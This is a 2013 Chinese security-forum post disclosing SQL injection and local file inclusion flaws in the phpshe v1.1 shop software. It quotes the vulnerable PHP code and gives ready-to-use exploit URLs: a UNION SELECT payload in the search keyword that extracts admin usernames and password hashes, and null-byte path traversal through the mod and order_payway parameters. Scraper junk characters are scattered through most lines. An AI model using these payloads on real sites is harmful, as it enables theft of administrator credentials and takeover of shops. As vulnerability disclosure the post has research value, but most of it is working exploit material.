中国网络渗透测试联盟

标题: phpshe v1.1多处SQL注入和文件包含漏洞Getshell [打印本页]
作者: admin    时间: 2013-4-19 19:01
标题: phpshe v1.1多处SQL注入和文件包含漏洞Getshell
/*******************************************************/8 Y$ o% i4 z. J3 e3 \$ M
/* Phpshe v1.1 Vulnerability; @2 U* L% n' ~! Z0 g2 }1 c
/* ========================0 O7 x8 ?8 q0 {7 q( V) e
/* By: : Kn1f3
+ v- x1 ~6 z( _0 |/* E-Mail : 681796@qq.com
) p: w: A' B5 V/*******************************************************/- Z& `, R0 r0 f: R- f6 x4 H+ j; f
0×00 整体大概参数传输
% K  k/ L/ D$ T/ s5 m- k
( v! y7 N8 F3 f6 U9 M
4 b! d. _0 d2 Q& F/ M, {$ s. @
! |1 Q/ ^* i6 B' l//common.php& k& z! h( ]9 g: k
if (get_magic_quotes_gpc()) {
1 Y) M8 A( ~& O!empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');3 ]  ^( X# G# M5 ^8 M/ F
!empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');& M# y6 ~8 A6 N: B0 E
}
7 _$ l* p  \. Belse {% @9 x$ V; g% Z. s7 d
!empty($_GET) && extract(pe_trim($_GET),EXTR_PREFIX_ALL,'_g');
0 X3 _" |4 U- K. X4 T9 P, B$ I3 p!empty($_POST) && extract(pe_trim($_POST),EXTR_PREFIX_ALL,'_p');
6 j  M& `, k% j4 @}2 m5 Y9 \" r2 N0 R( _" g2 d
session_start();
8 l( E+ d. O2 Z! q# \; |!empty($_SESSION) && extract(pe_trim($_SESSION),EXTR_PREFIX_ALL,'_s');
% v! c' S3 X- M!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)),EXTR_PREFIX_ALL,'_c');1 U5 x" {8 {- p& r9 [

) q7 t' g; N( q6 ]% `0 h! s& k0×01 包含漏洞
4 ~( e4 F6 J" x( l6 v- l$ h( E 2 d" C- @0 ?' c% N1 X4 e9 r- S. `
6 k3 k" O1 p" r  m2 v4 W3 U& i
//首页文件
3 H4 z, [2 t  I8 S) R( U<!--?php include('common.php'); $cache_category = cache::get('category'); $cache_category_arr = cache::get('category_arr'); $cache_class = cache::get('class'); $cache_ad = cache::get('ad'); $cache_link = cache::get('link'); $cache_page = cache::get('page'); $web_qq = $cache_setting['web_qq']['setting_value'] ? explode(',', $cache_setting['web_qq']['setting_value']) : array(); $cart_num = pe_login('user') ? $db--->pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);
! t4 i& |" N$ D! L4 W* Oinclude("{$pe['path_root']}module/{$module}/{$mod}.php");  //$mod可控造成“鸡肋”包含漏洞' z2 _7 N1 T# M0 k
pe_result();
/ G# V7 r- Z3 m! r8 h$ D3 |9 X+ J+ X?>: @8 K( `4 B, p1 q5 |$ o
//common 文件 第15行开始) Q$ r- |# l/ e2 K) a5 |
url路由配置- y+ ?9 f* W; P0 E
$module = $mod = $act = 'index';- Q& k% G- L6 p$ l$ T3 Q
$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);  L8 I. V# \4 \
$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);
9 N/ q- V% T3 H8 [  Y$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);# e' K$ h! B, n" G$ n
//exp:http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%00
7 J+ |# V/ a# L7 p; A+ B

+ K4 E4 d/ G" a

' A0 w/ K: z6 l! h7 @" m 0×02 搜索注入, d, _) k! u" \8 m6 E/ I2 [
1 g/ {3 ]0 p3 ^/ ~
<code id="code2">

//product.php文件# I3 k& j/ S, Q2 h, W
case 'list':( Q$ s+ S1 }' f
$category_id = intval($id);6 q) C: s" Y' i& s8 y6 R% W' H9 T
$info = $db->pe_select('category', array('category_id'=>$category_id));
# @5 H/ ^. z* J$ D. ~//搜索/ d: d3 ^3 Q+ [( C2 F4 x
$sqlwhere = " and `product_state` = 1";* p* E9 J3 a/ }! c# f6 J6 ~; T
pe_lead('hook/category.hook.php');
) }3 D# H7 ~! s$ C1 b' C# yif ($category_id) {
# U% |$ ~* }* Xwhere .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";
9 [# A0 \+ T! _2 g}1 Y8 c) u6 |* `
$_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; //keyword变量未进行有效的sql语句过滤$ Z8 r7 x2 P5 ?% @6 C. {# [) m
if ($_g_orderby) {
$ \8 O' ~  V* i+ u9 ~5 L0 T$orderby = explode('_', $_g_orderby);! w" {* M& F5 |" n. \
$sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";
. v& O( I& `  ~- g" ~2 y5 \}4 s% q( i8 M" F) `) |- a  R
else {
) K: R- i* }- D$ U3 w$sqlwhere .= " order by `product_id` desc";
5 g& S& c/ R& E}) I2 G0 O7 F2 t: L. t' S
$info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));
: g' V" }* P( Y. D) i( X//热卖排行
1 f( q; B' u/ X$product_hotlist = product_hotlist();" i; j' v8 c# g& c5 D. v
//当前路径/ U- j4 q9 [4 ^4 c# K0 x* Z- L
$nowpath = category_path($category_id);
$ ~4 Z/ @4 R/ O1 o1 t) T0 u# @$seo = pe_seo($info['category_name']);1 `$ Z7 {( x: w& z
include(pe_tpl('product_list.html'));, N- B/ S+ z6 |' b8 H9 m+ P* b$ {* p
//跟进selectall函数库
" K4 v/ F; U7 C- v6 Tpublic function pe_selectall($table, $where = '', $field = '*', $limit_page = array())
5 j9 X$ f6 ~$ N2 G{
+ A! B! ~- p* [% i$ n* M//处理条件语句9 H  P" n- h" z1 O' f2 O/ @
$sqlwhere = $this->_dowhere($where);
7 w1 z0 [) G9 Q9 [8 w: q2 S0 ~return $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);
2 s- W5 y6 D" T( {0 ]7 S' g}
0 v/ w: ]* b; h4 x3 W$ A//exp
+ k/ n% J, S! p. X" j& }product/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1# N: z# }$ m5 n( G4 j$ k

</code>( \+ @6 O1 V0 L* d
! x. r5 H3 o0 F9 ]
0×03 包含漏洞2/ H8 K; N6 m' I0 o. I
- r5 A1 L! l" K2 h3 ]! R
<code id="code3">

//order.php

case 'pay':


- x2 e0 @% N! B9 x2 Z( T: l7 L$order_id = pe_dbhold($_g_id);

  J7 b8 i4 F  J. Z' e' y
$cache_payway = cache::get('payway');


& ]! W+ z* A5 T) M* yforeach($cache_payway as $k => $v) {

7 M7 q+ p( T0 M/ I
$cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);

2 k, z; r( U  ?$ A/ u4 U% g0 Y# ]
if ($k == 'bank') {

; p4 q" m  ?% b  ^# Z- {
$cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);

; R% \* @  u6 `9 u0 \
}


! B/ O2 D5 {7 d" w}

$ r: e! a) m9 F2 s& p
$order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));

+ [" @1 \" w* o4 J
!$order['order_id'] && pe_error('订单号错误...');

) d9 I3 ~8 F! Z: z; g
if (isset($_p_pesubmit)) {

4 h0 A: j% C5 j7 T' d0 |! l
if ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {


% J+ S, R7 k' Y3 Z- G$info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));


, \# m# q& U5 t3 Cforeach ($info_list as $v) {

3 o2 b0 X8 p1 l; n9 p$ l' E. C) f
$order['order_name'] .= "{$v['product_name']};";$ s. }- H9 e8 }8 G6 U# B

2 D( b7 |6 `& l7 u1 B% T( u
}

5 L' E- I: f1 g, ^& G
echo '正在为您连接支付网站,请稍后...';

& a9 u  ~  \0 E
include("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");

6 @4 z5 o( n0 q! P" P. ~
}//当一切准备好的时候就可以进行"鸡肋包含了"

8 t9 n; l  T$ K; r; Y
else {


1 X1 b1 ?3 e: R  Ope_error('支付错误...');


& L* c* J/ S0 P" f2 K}

% F% a; B  D5 E7 M5 i$ v
}


) @3 I8 @4 C4 _, |$seo = pe_seo('选择支付方式');


2 n. N( y" S+ m! Y/ ?5 ^% E4 X! qinclude(pe_tpl('order_pay.html'));

5 n4 y& Y! W" \% g4 b) r" ]
break;

}

//exp:

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>! m& ]) _' P7 i* k8 E' y




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2